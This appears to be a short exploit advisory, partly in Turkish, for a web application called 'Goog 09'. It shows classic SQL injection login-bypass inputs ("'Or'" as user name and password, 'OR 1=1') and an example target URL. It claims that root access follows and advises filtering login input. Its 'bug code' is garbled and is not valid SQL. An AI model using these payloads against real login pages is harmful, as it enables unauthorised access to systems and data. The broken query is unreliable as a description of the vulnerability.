#############################################################

# Application Name : Goog 09

# Vulnerable Type : SQL Injection ~ Login Bypass

# Infection : Sistemde root yetkisi elde edilebilir

# Bug Fix Advice : Login girisi filtrelenmeli

# author : Bug Researchers / Kaiser

#############################################################

< ------------------- header data end of ------------------- >


< -- bug code start -- >


select CHKUser
FROM table
where index.asp?id=1 OR 1=1


< -- bug code end of -- >

Exm: http://goog-123.com/index.asp

USER LOGIN : Name; ’Or’

password; ’Or’